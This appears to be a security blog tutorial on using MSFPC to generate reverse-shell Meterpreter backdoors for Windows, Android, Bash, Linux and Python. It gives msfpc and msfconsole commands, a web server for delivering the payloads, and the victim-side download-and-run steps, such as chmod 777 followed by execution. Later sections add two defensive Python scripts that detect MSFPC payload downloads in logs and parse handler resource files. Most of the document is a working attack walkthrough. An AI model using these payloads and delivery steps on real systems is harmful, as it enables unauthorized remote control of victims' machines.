Hello Friends!!
As you are all aware, MSFvenom, the payload-generation tool in Kali Linux, is also available as MSFvenom Payload Creator (MSFPC), a wrapper for generating various "basic" Meterpreter payloads via msfvenom. The end goal is to fully automate msfvenom and Metasploit.
MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payloads based on the user's choice. The idea is to be as simple as possible (requiring only one input) to produce the payload.
Author: g0tmi1k
SYNTAX
msfpc
() () () ()
() ()
() ()
Create a Payload with Interactive IP Mode
Let's create a payload for the Windows platform with the help of the following command:
msfpc windows
When you enter the above command, it will automatically ask you to confirm the interface:
Which interface should be used?
eth0, lo wan
We press 1 for eth0, and it will then start generating the payload and as a result give us the following:
1. Location of the MSF handler file and the Windows Meterpreter payload created.
2. Command to be run to start multi/handler automatically within the Metasploit Framework.
3. Command for file transfer through a web server.
Basically, msfpc is designed to reduce the user's effort in generating payloads for various platforms, each in its own file format. So when you type "msfpc" with no arguments, it will display all supported platforms and the file format it generates for each.
Syntax: msfpc
Windows Payload
If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Windows, all you need to do is type the following:
msfpc windows 192.168.1.109 1234
If you do not mention an IP, it will automatically ask you to choose an interface as discussed above, and it uses 443 as the default LPORT. It creates a malicious backdoor in .exe format for 32-bit architecture. Then it will start generating the payload and as a result give us the following details:
· Location of MSF handler file and Windows Meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'
· Command to be run to start multi handler automatically: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
· Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following commands to launch multi/handler and the web server for file transfer.
msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080
When the victim browses the following URL, it will ask to download and run the .exe file, which will provide a Meterpreter session to the attacker.
http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe
Conclusion: Earlier, attackers used a manual method: generate a payload via the msfvenom command and then use the Metasploit module "multi/handler" to receive the reverse connection as a Meterpreter session. This technique was quite a successful approach to compromising a victim's machine, although it took much time. The same approach is applicable with the help of MSFPC for generating various "basic" Meterpreter payloads via msfvenom.
Android Payload
If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Android, all you need to do is type the following:
msfpc apk 192.168.1.109 1234
It creates a malicious backdoor in .apk format. Then it will start generating the payload and as a result give us the following details:
· Location of MSF handler file and Android Meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'
· Command to be run to start multi handler automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
· Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following commands to launch multi/handler and the web server for file transfer.
msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080
When the victim browses the following URL, it will ask to install the application; running the .apk file will provide a Meterpreter session to the attacker.
http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk
Hence you can observe, as said above, that we have a Meterpreter session on the target's machine.
BASH
The advantage of MSFPC is that it removes the need to remember the format for each platform; all we need to do is follow the syntax declared above, and the rest will be managed by MSFPC automatically. Suppose I want to create a payload for the Bash platform; it will take MSFPC only a few minutes to generate a bash payload.
msfpc bash 192.168.1.109 1234
It creates a malicious backdoor in .sh format. Then it will start generating the payload and as a result give us the following:
· Location of MSF handler file and bash Meterpreter created: '/root/bash-shell-staged-reverse-tcp-1234.sh'
· Command to be run to start multi handler automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
· Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following commands to launch multi/handler and the web server for file transfer.
msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080
When the victim browses the following URL, it will ask to download the script; once the target runs the bash script with full permission, it will give a command shell.
http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh
Hence you can observe, as said above, that we have a command shell on the target's machine, and with the help of the following command we have upgraded it into a Meterpreter shell.
sessions -u 1
Linux
If you want to generate a payload to get a Meterpreter session on a victim's machine that runs Linux, all you need to do is type the following:
msfpc linux 192.168.1.109 4444
It creates a malicious backdoor in .elf format. Then it will start generating the payload and as a result give us the following details:
· Location of MSF handler file and Linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
· Command to be run to start multi handler automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
· Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following commands to launch multi/handler and the web server for file transfer.
msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080
When the victim browses the following URL, it will ask to download the file; once the target runs the .elf file with full permission, it will give a command shell.
http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf
Hence you can observe, as said above, that we have a command shell on the target's machine, and with the help of the following command we have upgraded it into a Meterpreter shell.
sessions -u 1
Python
If you want to generate a payload to get a Meterpreter session on a victim's machine that has Python installed, all you need to do is type the following:
msfpc python 192.168.1.109 5555
It creates a malicious backdoor in .py format. Then it will start generating the payload and as a result give us the following details:
· Location of MSF handler file and python Meterpreter created: '/root/python-meterpreter-staged-reverse_tcp-5555.py'
· Command to be run to start multi handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
· Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following commands to launch multi/handler and the web server for file transfer.
msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080
When the victim browses the following URL, it will ask to download the script; once the target runs the python script, it will give a Meterpreter session.
http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py
Hence you can observe, as said above, that we have a Meterpreter session on the target's machine.
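Every file name in the Windows, Android, Bash, Linux and Python sections above follows the same MSFPC pattern: platform, payload kind, staged/stageless, transport and the handler port, plus an extension. That regularity is useful on the defensive side, because a web-server log entry for such a file reveals the payload type and the port its multi/handler listens on. The script below is an added example written for this page, not code from the original post or from MSFPC; it decodes that naming pattern and scans constructed SimpleHTTPServer-style log lines for it. The post only shows reverse-tcp transports; the bind and http/https alternatives in the pattern are an assumption about MSFPC's other modes.

```python
import re
from typing import Optional

# MSFPC names each payload it writes
#   <platform>-<meterpreter|shell>-<staged|stageless>-<transport>-<port>.<ext>
# (all five file names in the post follow this). The post shows only
# reverse-tcp, written with '-' or '_'; bind and http/https transports are an
# assumption about MSFPC's other modes, not something the post shows.
MSFPC_NAME = re.compile(
    r"^(?P<platform>[a-z]+)-(?P<kind>meterpreter|shell)-(?P<stage>staged|stageless)"
    r"-(?P<transport>(?:reverse|bind)[-_](?:tcp|https?))-(?P<port>\d{1,5})"
    r"\.(?P<ext>[a-z0-9]+)$"
)

# One request line as 'python2 -m SimpleHTTPServer' prints it; Apache-style
# combined logs match as well, since only the leading fields are used.
REQUEST = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def decode_msfpc_name(filename: str) -> Optional[dict]:
    """Split an MSFPC-style file name into its parts; None if it does not match.
    The trailing number is the LPORT the matching multi/handler listens on,
    so it tells a defender which outbound connection the payload will make."""
    m = MSFPC_NAME.match(filename)
    if m is None:
        return None
    info = m.groupdict()
    info["port"] = int(info["port"])
    info["transport"] = info["transport"].replace("_", "-")  # normalise reverse_tcp
    return info


def find_msfpc_downloads(log_text: str) -> list:
    """Return one record per request whose requested file name decodes as an
    MSFPC payload, whatever directory it was served from."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if m is None:
            continue
        name = m.group("path").split("?", 1)[0].rsplit("/", 1)[-1]
        info = decode_msfpc_name(name)
        if info is None:
            continue
        hits.append({"client": m.group("client"), "time": m.group("ts"),
                     "file": name, "status": int(m.group("status")), **info})
    return hits


# Constructed sample: the lines SimpleHTTPServer would print for two of the
# downloads described in the post, plus two unrelated requests.
SAMPLE_LOG = """\
192.168.1.50 - - [10/Mar/2019 10:01:02] "GET /index.html HTTP/1.1" 200 -
192.168.1.50 - - [10/Mar/2019 10:01:09] "GET /root/windows-meterpreter-staged-reverse-tcp-1234.exe HTTP/1.1" 200 -
192.168.1.77 - - [10/Mar/2019 10:02:41] "GET /root/python-meterpreter-staged-reverse_tcp-5555.py HTTP/1.1" 200 -
192.168.1.77 - - [10/Mar/2019 10:03:00] "GET /docs/report.pdf HTTP/1.1" 404 -
"""

if __name__ == "__main__":
    for hit in find_msfpc_downloads(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} fetched {hit["file"]}: '
              f'{hit["platform"]} {hit["kind"]} ({hit["stage"]}, {hit["transport"]}) '
              f'-> expect a connection to port {hit["port"]}')
```

Run it as-is to see the two payload downloads from the sample log reported with their decoded fields; the same `find_msfpc_downloads` call works on a real access log read from disk. Note that the pattern only catches payloads left with MSFPC's default names, so it is a cheap first pass, not a substitute for inspecting the files themselves.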
Batch (Generates All Possible Combination Payloads)
Batch is the most significant mode, as it generates as many payload combinations as possible. If we want to create all payloads which can give a Meterpreter session, we can use the following command:
msfpc msf batch eth0
In the output shown below you can observe that it has generated all possible types of payload which can give Meterpreter sessions. The rest of the technique for executing the payload and getting the reverse connection is the same as above.
If we want to create all payloads which can give a command shell session on the target's machine, we can use the following command:
msfpc cmd batch eth0
In the output shown below you can observe that it has generated all possible types of payload which can give a command shell.
Loop (Generates One Payload for Each Platform)
Loop is also a very significant mode, as it generates one of each type of payload with its default values. Hence, by default, it will generate payloads that provide a Meterpreter session rather than a command shell session.
msfpc verbose loop eth0
In the output shown below you can observe that it has generated one payload for each platform, each of which can give a Meterpreter session. The rest of the technique for executing the payload and getting the reverse connection is the same as above.
Generating Stageless Payload
As we all know, there are two types of payloads, i.e. staged and stageless, and by default MSFPC creates a staged payload. If you want to create a stageless payload, you can use the following commands to generate a stageless payload for a command shell session or a Meterpreter session respectively.
msfpc stagless cmd window 192.168.1.109
msfpc stagless msf window 192.168.1.109
The rest of the technique for executing the payload and getting the reverse connection is the same as above.
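Each section above starts the listener with `msfconsole -q -r <file>.rc`, i.e. by replaying a Metasploit resource script, and the staged/stageless distinction just discussed is visible in the Metasploit payload name inside such a script: a staged payload names stage and stager as separate path parts (`windows/meterpreter/reverse_tcp`), a stageless one joins them with an underscore (`windows/meterpreter_reverse_tcp`). When an analyst recovers one of these `.rc` files, reading out the module, payload, LHOST and LPORT tells them exactly which connection the handler was waiting for. The following is an added example for this page, not code from the post or from MSFPC; the two resource scripts in it are constructed to resemble a multi/handler script and are not the files MSFPC writes.

```python
from typing import Optional

# Constructed resource scripts (not the files MSFPC writes): a staged handler
# like the one 'msfconsole -q -r <file>.rc' in the post would replay, and a
# stageless one for comparison.
SAMPLE_RC_STAGED = """\
# multi/handler for the staged Windows payload from the post
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.109
set LPORT 1234
set ExitOnSession false
run -j
"""

SAMPLE_RC_STAGELESS = """\
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.109
set LPORT 443
exploit
"""

# Metasploit stage names: they sit between platform and stager in staged
# payload names and form the prefix of stageless ones.
STAGES = ("meterpreter", "shell", "vncinject", "dllinject")


def parse_rc(text: str) -> dict:
    """Read an msfconsole resource script: 'use <module>', 'set/setg KEY VALUE'
    and whether a run/exploit line is present. Lines starting with '#' are comments."""
    module, options, launches = None, {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        cmd = parts[0].lower()
        if cmd == "use" and len(parts) >= 2:
            module = parts[1]
        elif cmd in ("set", "setg") and len(parts) >= 3:
            options[parts[1].upper()] = " ".join(parts[2:])
        elif cmd in ("run", "exploit"):
            launches = True
    return {"module": module, "options": options, "launches": launches}


def classify_payload(name: str) -> dict:
    """Staged payloads name stage and stager as separate path parts
    (windows/meterpreter/reverse_tcp); stageless ones join them with '_'
    (windows/meterpreter_reverse_tcp). Anything else is treated as a
    self-contained single payload such as cmd/unix/reverse_bash."""
    parts = name.split("/")
    last = parts[-1]
    if len(parts) >= 3 and parts[-2] in STAGES and last.startswith(("reverse_", "bind_")):
        return {"platform": "/".join(parts[:-2]), "kind": parts[-2],
                "stage": "staged", "transport": last}
    for stage in STAGES:
        if last.startswith(stage + "_"):
            return {"platform": "/".join(parts[:-1]), "kind": stage,
                    "stage": "stageless", "transport": last[len(stage) + 1:]}
    return {"platform": "/".join(parts[:-1]), "kind": last,
            "stage": "single", "transport": None}


def describe_handler(rc_text: str) -> Optional[dict]:
    """What a resource script's multi/handler will listen for; None if the
    script does not set up multi/handler with a payload."""
    parsed = parse_rc(rc_text)
    opts = parsed["options"]
    if parsed["module"] != "exploit/multi/handler" or "PAYLOAD" not in opts:
        return None
    info = classify_payload(opts["PAYLOAD"])
    lport = opts.get("LPORT", "")
    info.update({"payload": opts["PAYLOAD"], "lhost": opts.get("LHOST"),
                 "lport": int(lport) if lport.isdigit() else None,
                 "launches": parsed["launches"]})
    return info


if __name__ == "__main__":
    for script in (SAMPLE_RC_STAGED, SAMPLE_RC_STAGELESS):
        h = describe_handler(script)
        print(f'{h["payload"]}: {h["stage"]} {h["kind"]} over {h["transport"]}, '
              f'listening on {h["lhost"]}:{h["lport"]}, started={h["launches"]}')
```

The staged/stageless split matters to a defender because a staged payload only carries a small stager and pulls the real stage from the handler after connecting, so the first connection to the LPORT is followed by a sizeable download; a stageless payload is complete on its own. `parse_rc` keeps the last value when an option is set twice, which is also how msfconsole behaves when a script repeats a `set`.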